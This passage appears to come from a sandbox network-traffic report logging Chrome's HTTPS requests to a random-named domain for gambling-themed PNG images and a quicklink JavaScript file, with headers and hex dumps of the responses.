                                          2025-01-12 00:17:09 UTC16384INData Raw: 00 85 40 41 05 6c 98 bc d4 82 02 01 5a ad 42 51 69 65 a5 e9 80 00 80 29 21 40 12 09 11 15 95 cd 62 ea 05 10 48 00 17 b4 00 22 2a 83 99 78 79 f5 f6 14 92 b0 12 56 50 16 13 cf b3 d2 ce b7 4a 85 94 12 09 20 12 00 2e 69 9d 45 80 56 cc 8a 96 24 f0 d7 e7 a9 13 56 4d 0d 49 88 5e 5a a2 68 b6 40 33 21 65 37 3b e5 f2 d3 99 6e 59 25 6d 64 9a 16 8e 8a b9 d6 78 65 c9 04 9a c5 2a c9 ae 9e a9 7c df 99 c6 ff 00 3f de 7e b4 83 e1 cf a8 97 e9 93 ea 25 f3 a5 f9 8d e7 af 58 f3 ad c8 f5 13 ef a0 54 8b 31 d4 24 12 44 be 3b 51 26 0a ae b4 d0 93 ae 26 a8 6a 59 2c 0b 54 c4 50 aa 0a d5 a0 0a d4 44 20 00 0c ed e4 ce ae 44 a2 80 d0 e6 8e 6a 88 c0 b9 25 f3 66 b4 97 a2 5b 4d 74 e2 dc 14 26 5c 6b c2 de 33 b3 3b 32 8d 4b d5 4e 83 58 ea ae 3b 3d 0e 7b f6 f8 f4 f3 35 76 f5 79 b9 73 ae 1e
                                          Data Ascii: @AlZBQie)!@bH"*xyVPJ .iEV$VMI^Zh@3!e7;nY%mdxe*|?~%XT1$D;Q&&jY,TPD Dj%f[Mt&\k3;2KNX;={5vys
                                          2025-01-12 00:17:09 UTC16384INData Raw: a5 e5 33 36 ac a3 90 93 53 a8 eb b3 a8 d0 d2 b5 8b ea 5a cb a5 d6 e5 a5 8b 90 20 19 99 2d 0c 8b 59 a1 74 b9 2b a2 58 90 5a aa 80 01 50 41 08 33 b6 a6 52 e4 22 56 e7 48 11 cc b0 54 b8 97 8d 39 96 f1 dd 2f 01 ce 25 4d 73 6b 1e 87 1f 5f 8b cf ea 2c a4 d0 1c 5a e1 f2 3e 8f 8e 3a 73 af 3b 59 b6 37 e7 eb 1d 3c fa fd c4 7c 4d 7a 5c 7b 78 7e 8f 3d 6c c8 ae 75 cb 35 ee 73 e9 df ae 73 a9 e9 cd 72 c4 f4 e7 f4 d6 7d cd cf bf 9b f2 da 9f 9b cd 78 19 d5 f3 ae 7d 67 e8 cf 8e ce b9 7a f2 e6 96 b1 f4 1e 5f 5f 2e f1 1d f8 7a 67 1e f1 e0 eb 38 95 05 cd 0a 94 3a 0c 81 d0 64 49 d0 79 c6 70 36 aa 1d c7 11 e9 1e 79 42 4d 09 3d 12 a6 67 11 f4 07 9e 79 e0 dc a1 90 2a 5c d2 3e d3 1d 24 aa d8 1b a7 ea 11 e7 e7 7f 35 67 af 73 f7 7a cc 93 9b f9 03 7a 63 5f a7 6b 9f ca d7 cb af b5 ac
                                          Data Ascii: 36SZ -Yt+XZPA3R"VHT9/%Msk_,Z>:s;Y7<|Mz\{x~=lu5ssr}x}gz__.zg8:dIyp6yBM=gy*\>$5gszzc_k
                                          2025-01-12 00:17:09 UTC16384INData Raw: 3a 63 6b 98 9b c5 95 4b 3f 9b 65 f9 46 b1 1d 31 73 13 b0 1c 87 bd 5c f1 e5 82 a6 84 03 ec cf 8c 31 37 3b 0e 32 a5 48 8a d5 8d cc ca 12 40 2a 58 02 a0 b1 50 09 8f 6f cf e8 f7 b1 bd 4d ba 63 d1 e9 cb ce e7 d3 1e 7d 2d 66 72 df cf df d6 e9 8a 59 78 ee e7 be c4 f7 ba 73 e8 4e a3 9f a6 7f 2d d5 1d 7d 79 73 4b e7 72 e9 9d 78 bb c7 ed b9 7e 81 be 7e 6f 6e 73 bc 00 00 00 00 00 00 56 ad 00 02 81 78 00 01 53 1d e7 4c db 2c 93 00 00 00 00 00 00 00 00 00 00 45 56 14 28 9c 9a 6a 96 96 f1 3a 8c d9 2c 00 00 00 01 05 75 04 15 96 96 66 bb 46 f0 50 00 00 02 02 80 26 2c 00 00 00 00 00 02 95 54 99 74 00 00 54 9a 80 09 22 15 00 0a 00 24 00 00 00 01 6a 48 20 69 09 05 40 04 92 01 43 f3 fe 7d 3f 28 96 14 08 4c 73 a9 d6 44 67 53 62 cf 6c f1 f8 f6 d7 9f 5e 4b 8d 6c fd 47 8f 4f b9
                                          Data Ascii: :ckK?eF1s\17;2H@*XPoMc}-frYxsN-}ysKrx~~onsVxSL,EV(j:,ufFP&,TtT"$jH i@C}?(LsDgSbl^KlGO
                                          2025-01-12 00:17:09 UTC16384INData Raw: a1 91 18 18 23 14 39 21 96 f1 30 a9 31 25 a7 4d 69 31 34 7b d0 f6 ed 8a d9 8f c2 8e 2d ac 24 04 ab e1 28 9a dc ec 5d 6c a8 64 c4 d4 f1 76 85 09 93 b1 5d 52 1e 26 9f 88 71 42 b9 ab 7d 2d 96 3f 55 b7 56 2a ca ca cb 15 8a c5 63 ee 62 b1 58 ac 55 96 2b 15 65 8a b2 c5 5b dc c5 59 62 b1 56 58 f5 9d cc d0 82 60 42 0b 15 82 c5 62 b1 58 ac 16 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2a ca cb 15 8a c5 62 b1 58 ac 54 c7 8f cd 30 21 1e b1 fa 36 fa a9 32 86 4c 78 5f e8 d9 62 b0 75 8b ac 56 0e b1 58 ac 56 0b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 4b 15 82 c1 d3 82 70 71 7b a8 f8 85 62 b1 58 2c 09 60 b0 58 2c 16 0b 05 82 c5 60 b1 58 2c 16 2b 15 8a c5 62 ac b1 56 58 ac 55 96 2a ca ca ca ca ca cb 17 b3 a1
                                          Data Ascii: #9!01%Mi14{-$(]ldv]R&qB}-?UV*cbXU+e[YbVX`BbX+bXV+bXV+bXV*bXT0!62Lx_buVXVbXV+bXV+bKpq{bX,`X,`X,+bVXU*
                                          2025-01-12 00:17:10 UTC16384INData Raw: 0c 4b 1f a6 15 7e b1 fa 01 fa 16 6e a7 fd 01 7e ab 97 59 5f ab 78 15 d4 72 67 f4 2c 80 5a cb 66 cb 66 cb 66 cb 66 2b 66 cb 64 2b 66 2b 06 5b 21 5b 31 58 0a c0 56 c9 96 02 b0 15 b2 65 b2 65 b3 15 80 ad 93 2d 98 ac 05 60 2b 66 2b 01 58 0a 68 99 6c 99 6c 99 6c 99 6c 99 6c 99 6c 85 14 22 80 04 56 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 94 a1 f9 32 f4 50 88 49 18 bf a2 ac 84 4a 02 56 b6 e4 35 1e 0f 54 ef bd d3 1a 73 50 cd b2 91 89 45 2e d0 18 99 32 d4 43 65 50 ef f1 ef 4e 6a eb 25 92 cb ae e8 57 9a 85 37 b9 92 72 57 57 59 29 e4 cd f1 f2 ea 64 24 98 90 ba 1d e9 9a cb 9f 24 ed c4 ff 00 34 db 90 f3 24 24 9d d0 9a 63 de 9e 5e 15 19 70 ba 0f 34 0f 97 53 3e e5 92 14 6e b3 dc 98 90 1a ca fe e1 ee 64 cf bd 01 32 36 17 24 e2 f7 75 b9
                                          Data Ascii: K~n~Y_xrg,Zffff+fd+f+[![1XVee-`+f+Xhllllll"V2PIJV5TsPE.2CePNj%W7rWWY)d$$4$$c^p4S>nd26$u
                                          2025-01-12 00:17:10 UTC16384INData Raw: d3 73 74 4a 3e ca 90 46 c8 3b d0 03 3a 94 05 b9 28 e3 c9 d6 ce c4 84 b1 25 53 c5 bd 46 22 4a 11 df 65 95 93 4d 66 4e 57 77 74 d2 b0 c5 64 1b d5 91 f0 9b 29 f7 bb a7 ea 25 46 3b d1 35 90 92 27 ea a7 9f 02 e6 a9 47 da 29 cf ec a9 43 67 39 8f ab b2 1e f4 3d 42 5d 42 e8 10 f2 74 0e a1 3b 35 94 27 87 de e8 25 e2 42 cd 20 3b 17 27 5a ad 03 c6 f9 c5 bd 90 1e f4 29 ba 85 d4 27 bd 01 a1 7c 94 6b 89 d3 c2 27 13 b1 ac a9 28 1a cc 0f 9b a9 e7 73 72 23 e1 15 57 af 50 52 93 c6 26 f3 cd cb 08 b8 9f f9 6e 65 a6 9e b1 a9 49 78 05 a8 e9 df 9b 96 f2 45 d1 a8 25 38 e5 9e ae a2 59 23 7c 87 ca eb 55 ae 83 4f 8d ca a6 a8 03 f5 1b b4 eb 52 d6 4e be 46 18 b3 08 7c 2c fd ea 33 a8 33 70 0d c4 b4 4d 20 aa 25 ce c4 e2 37 cc b9 35 fc 87 d7 cd 6a b4 5a 86 76 92 07 68 07 b0 36 b8 b2 37
                                          Data Ascii: stJ>F;:(%SF"JeMfNWwtd)%F;5'G)Cg9=B]Bt;5'%B ;'Z)'|k'(sr#WPR&neIxE%8Y#|UORNF|,33pM %75jZvh67
                                          2025-01-12 00:17:10 UTC16384INData Raw: 94 41 35 4c d8 43 14 b3 4a fd c0 39 12 a8 a2 aa a4 26 1a 98 9e 13 f2 bf 12 78 dd 53 4b b1 93 68 d0 c5 27 a4 bc 4a b6 be ab 53 36 2a a9 c6 c1 c8 04 71 61 fd 91 50 05 3f 8c c5 9d 44 fa 58 fe 72 70 51 cd a3 77 45 34 bf 20 25 4c 60 ff 00 ea 7a 25 5c 9f 3c 41 44 3a bf 75 2e 9f 42 de 66 45 29 21 d3 ea 27 6c 67 9f 50 ac f4 8c 76 20 87 4f 1d 34 76 b1 e9 a1 4a df 16 39 9a 3a 1a ea f6 8a 2b cb 48 06 57 23 2e dd 87 c8 55 0d 14 14 30 ec a1 0f f1 bf a9 28 e3 55 33 43 4d 09 cd 3c 8d 1c 61 cc 89 52 6b 34 35 39 ef 38 d9 bb e5 6c 6e a4 d7 29 1b f3 64 f2 fd 9e cf ef 5a bf 49 1c c5 c4 25 08 83 ce eb 46 d4 02 ef a7 cf 72 a1 97 78 17 68 a2 77 ef 53 c1 35 0d 59 08 1e ce 68 4f bb b9 fc c7 d0 96 81 d2 31 9a 82 a1 ea 77 94 21 b5 76 1f 87 be c8 f0 d4 a8 a7 86 ed e5 fe 22 ea 0b 46
                                          Data Ascii: A5LCJ9&xSKh'JS6*qaP?DXrpQwE4 %L`z%\<AD:u.BfE)!'lgPv O4vJ9:+HW#.U0(U3CM<aRk4598ln)dZI%FrxhwS5YhO1w!v"F
                                          2025-01-12 00:17:10 UTC16384INData Raw: 83 f1 2a 88 46 7a 69 aa a9 8f 30 84 87 6a 26 38 9b 09 78 be cf 56 8f 00 0d 3d 66 a5 38 67 0d 30 63 10 97 23 94 b9 32 ac 96 59 a7 39 64 2c a5 3e d2 89 96 8f a2 d6 ea 9b c0 30 82 fc 52 aa 83 66 ca 08 8b 26 1e 67 f1 12 d3 07 fd 2c 1f ba 2e 3f dd bd 04 33 d7 56 b0 c6 39 4d 31 58 59 68 34 01 5f 25 6c 5c a2 a1 96 9e 99 8b cc 40 ae 7f c4 4b a7 f3 fb 36 a5 0d 47 7c 74 d9 7f fb 41 54 bf 84 39 61 82 31 7d 28 6f 10 88 5f 6a a8 fa 55 4f f8 d6 ae b8 a8 8d b6 b3 45 3e e2 bd ac 38 a1 a8 80 fd a4 a8 e2 0f 66 90 cb 28 4f 88 b0 e4 d9 79 78 95 7d 07 b3 e5 2c 5b e1 f5 f0 7d a5 a3 0d b5 3a 32 f8 6a 22 fe f5 2d e9 cf 84 b1 70 75 4b a8 4a c0 d9 28 ab 42 46 df 6b fe e5 49 a8 45 13 b5 ea ca 1f bf 25 a3 ce 2f 0b 94 75 31 55 65 bc b0 3b e2 2a 29 f3 c9 1e 04 18 c8 39 02 0a 00 0c 8e
                                          Data Ascii: *Fzi0j&8xV=f8g0c#2Y9d,>0Rf&g,.?3V9M1XYh4_%l\@K6G|tAT9a1}(o_jUOE>8f(Oyx},[}:2j"-puKJ(BFkIE%/u1Ue;*)9


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          98192.168.2.449850122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC603OUTGET /imgs/2025shiyunhui.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: image/png
                                          Content-Length: 27838
                                          Last-Modified: Tue, 01 Oct 2024 17:57:38 GMT
                                          Connection: close
                                          ETag: "66fc3812-6cbe"
                                          Expires: Tue, 11 Feb 2025 00:17:09 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 35 00 00 01 f1 08 03 00 00 00 3b b8 db 94 00 00 02 9d 50 4c 54 45 ff ff ff fe fe fa 33 2a 29 fa fa f8 35 2c 2c 36 30 2f fe fa fd 2b 24 23 f1 31 64 84 58 b6 24 1f 1e f6 f5 f4 7c 51 b6 f5 ff fd fb 41 79 f4 38 6a 21 19 19 f6 3c 70 2e 2a 27 e7 e6 19 01 01 01 68 41 a5 77 49 b4 4d af e6 63 bd 93 57 ae e2 8c 5d b4 70 45 b1 5c 5a 59 3c b0 e7 44 af e9 3a 35 35 eb 2b 5d e0 23 56 ec e6 12 35 b1 ec 60 af 1e bc 10 3d fc ea 05 d4 19 4a 6e ac dd 1d 17 17 69 45 af 74 70 6f 60 ba 9a da 1f 50 fe ff f0 9f 09 2e f4 e7 13 70 9a d6 f5 e9 08 4f 58 b5 5f ae e2 7a bc 39 a7 0c 32 e4 2b 5d 75 a8 dd 28 b3 eb ec e5 1b b6 0f 3a c5 c4 c3 94 92 91 40 3c 3b e5 e3 2a ae 0c 35 8b 88 87 62 81 c7 47 44 43 67 ab e2 87 62 b5 e2 e1 e0 54
                                          Data Ascii: PNGIHDR5;PLTE3*)5,,60/+$#1dX$|QAy8j!<p.*'hAwIMcW]pE\ZY<D:55+]#V5`=JniEtpo`P.pOX_z92+]u(:@<;*5bGDCgbT
                                          2025-01-12 00:17:09 UTC11800INData Raw: 6a 64 da 54 e6 63 a6 3f b6 4f 29 bd 1d 7b d3 0a a5 58 a4 53 dd 68 b7 98 ba 2c c4 00 e5 10 64 43 6e bb 8a 3d b8 0d 72 40 01 1e fc dd 4a 46 0d 9b 77 7b ed c4 91 02 9c 67 43 bb d3 f6 ea a8 b3 12 8b 96 e0 e0 69 3e b6 f9 3c 37 f8 96 25 0c d4 ad 46 c7 7d a6 01 2f c7 80 52 8d 38 cc 47 4c 6e 16 da 53 fe 41 b1 fd f1 90 ed 33 27 bf dd aa e1 3b c0 0e 8d 7d 13 b6 8a c4 96 33 64 d9 e3 c5 78 3f 3a 57 41 77 36 1e d5 6f 3a 9a 5d 1c f8 cf a3 f6 ea 7d 11 7e 71 ff 6b 3b d5 53 b6 6f 04 35 88 79 cf a2 d7 44 49 4c 1e 1a e8 ed 93 38 3a 76 21 fb a3 85 ba 18 83 ed 37 a0 d1 be 23 bb c3 f1 3a 04 60 8a b9 36 37 a3 8e e4 8c 0d 60 2b 7e d4 07 5d f2 b4 48 84 5a e2 1a ae f5 a1 87 11 34 70 5b 8d 7c f7 34 24 1e 37 e2 2b f3 4c 57 1d c8 31 40 79 d6 36 67 d4 72 6f 5f 32 15 cd da 14 6a 1b 6f
                                          Data Ascii: jdTc?O){XSh,dCn=r@JFw{gCi><7%F}/R8GLnSA3';}3dx?:WAw6o:]}~qk;So5yDIL8:v!7#:`67`+~]HZ4p[|4$7+LW1@y6gro_2jo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          99192.168.2.449851122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC360OUTGET /imgs/leijingji.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: image/png
                                          Content-Length: 9569
                                          Last-Modified: Thu, 19 Dec 2024 06:51:15 GMT
                                          Connection: close
                                          ETag: "6763c263-2561"
                                          Expires: Tue, 11 Feb 2025 00:17:09 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC9569INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 06 00 00 00 88 ec 5a 3d 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                          Data Ascii: PNGIHDRZ=gAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          100192.168.2.449853122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC357OUTGET /imgs/betway.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: image/png
                                          Content-Length: 6928
                                          Last-Modified: Fri, 04 Oct 2024 20:16:00 GMT
                                          Connection: close
                                          ETag: "67004d00-1b10"
                                          Expires: Tue, 11 Feb 2025 00:17:09 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC6928INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 00 d8 50 4c 54 45 22 22 22 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 ff ff ff fb fb fb 1b 1b 1b 16 16 16 0e 0e 0e 29 29 29 f9 f9 f9 f7 f7 f7 be be be b7 b7 b7 34 34 34 af af af f2 f2 f2 46 46 46 2f 2f 2f 77 77 77 40 40 40 3b 3b 3b e9 e9 e9 db db db d6 d6 d6 cd cd cd e0 e0 e0 6b 6b 6b 86 86 86 6f 6f 6f 4b 4b 4b 9a 9a 9a 8b 8b 8b 73 73 73 5d 5d 5d c4 c4 c4 62 62 62 ed ed ed a3 a3 a3 e4 e4 e4 c8 c8 c8 b3 b3 b3 a7 a7 a7 d1 d1 d1 53 53 53 57 57 57 4f 4f 4f 80 80 80 7c 7c 7c 67 67 67 9e 9e 9e 90 90 90 94 94 94 06
                                          Data Ascii: PNGIHDR2PLTE""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""")))444FFF///www@@@;;;kkkoooKKKsss]]]bbbSSSWWWOOO|||ggg


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          101192.168.2.449852122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC603OUTGET /imgs/2026shijiebei.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: image/png
                                          Content-Length: 16719
                                          Last-Modified: Tue, 01 Oct 2024 17:57:40 GMT
                                          Connection: close
                                          ETag: "66fc3814-414f"
                                          Expires: Tue, 11 Feb 2025 00:17:09 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 0c 00 00 01 9b 08 03 00 00 00 06 31 5e 5a 00 00 02 b8 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b2 9b 5b 00 00 00 ff ff ff 1f 0f 0a 2d 1c 0e bb 95 45 6e 4a 1d 7d 54 21 66 3e 17 94 67 28 10 0d 0c 9c 6c 29 50 2e 11 a3 75 2c aa 79 2c 05 31 1d 55 35 13 40 26 10 ab 80 31 08 26 17 b5 85 33 a3 7d 36 85 5a 23 5c 3a 15 9d 72 2b 2a 14 0b 76 4d 1f 39 23 11 ee df a7 b2 8d 43 76 47 1c 8e 63 27 d7 b9 77 87 5f 26 46 2b 12 0a 1c 12 3b 1b 0d c7 a5 58 01 43 27 b9 8e 41 8c 5d 24 61 41 18 02 53 35 93 60 26 84 53 21 23 17 0b f1 e7 bb 03 3c 23 75 54 22 dc c3 75 c3 9a 44 d5 b5 64 ca aa 61 9a
                                          Data Ascii: PNGIHDR1^ZPLTE[-EnJ}T!f>g(l)P.u,y,1U5@&1&3}6Z#\:r+*vM9#CvGc'w_&F+;XC'A]$aAS5`&S!#<#uT"uDda
                                          2025-01-12 00:17:09 UTC681INData Raw: c5 e9 d9 38 70 a6 8f 25 d1 ad b9 e3 0f 5d 07 bf 0c f7 83 b5 e9 9c 9c f1 d7 5e 2c ff 75 8b 29 fb 65 bc 06 c9 a0 28 ce 47 be c9 45 f2 85 6e 69 54 bf 0c 1b 22 a3 e0 a7 84 43 f8 49 2c 92 ff 53 2d 46 ef 97 51 60 88 8c f6 72 99 86 5e ac a4 46 24 92 3f ab 56 10 f6 cb 68 43 64 34 96 a3 38 df 7d 45 bb 31 92 0d dc cc 1a 63 b1 3d b7 17 22 a3 a6 28 ce 26 bb df 6c 15 c6 b1 06 a5 d4 e5 91 71 c8 cf 64 37 e5 8c 26 bf 70 fc 76 15 4b 67 8a 44 f2 44 b5 49 96 4a e8 e2 ed a5 bd 90 75 7e 18 89 61 a1 d4 56 4f 53 46 b9 75 90 f9 74 7d 04 a5 ea a8 4a 32 28 57 f4 93 63 0c 0f 40 c8 7e 9d e8 c9 d8 f5 59 90 88 e4 89 52 67 3d 4d 19 a7 3e 09 12 91 7c a1 d4 ea 45 51 46 e5 1a 10 5a 4d 5a 42 18 06 03 d0 91 51 bb 06 64 56 93 8c 4e 73 3d 4d 19 b6 a1 41 50 31 b5 c0 6a d2 13 04 92 62 00 2a 32
                                          Data Ascii: 8p%]^,u)e(GEniT"CI,S-FQ`r^F$?VhCd48}E1c="(&lqd7&pvKgDDIJu~aVOSFut}J2(Wc@~YRg=M>|EQFZMZBQdVNs=MAP1jb*2


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          102192.168.2.449854122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC537OUTGET /quicklink.umd.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC378INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 3711
                                          Last-Modified: Sun, 28 Jul 2024 08:53:58 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "66a60726-e7f"
                                          Expires: Sun, 12 Jan 2025 12:17:09 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC3711INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6e 28 65 78 70 6f 72 74 73 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 5d 2c 6e 29 3a 6e 28 65 2e 71 75 69 63 6b 6c 69 6e 6b 3d 7b 7d 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 2c 74 29 7b 28 74 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 29 2e 6f 70 65 6e 28 22 47 45
                                          Data Ascii: !function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n(e.quicklink={})}(this,function(e){function n(e){return new Promise(function(n,r,t){(t=new XMLHttpRequest).open("GE


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          103192.168.2.449855122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC360OUTGET /imgs/tychongse.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
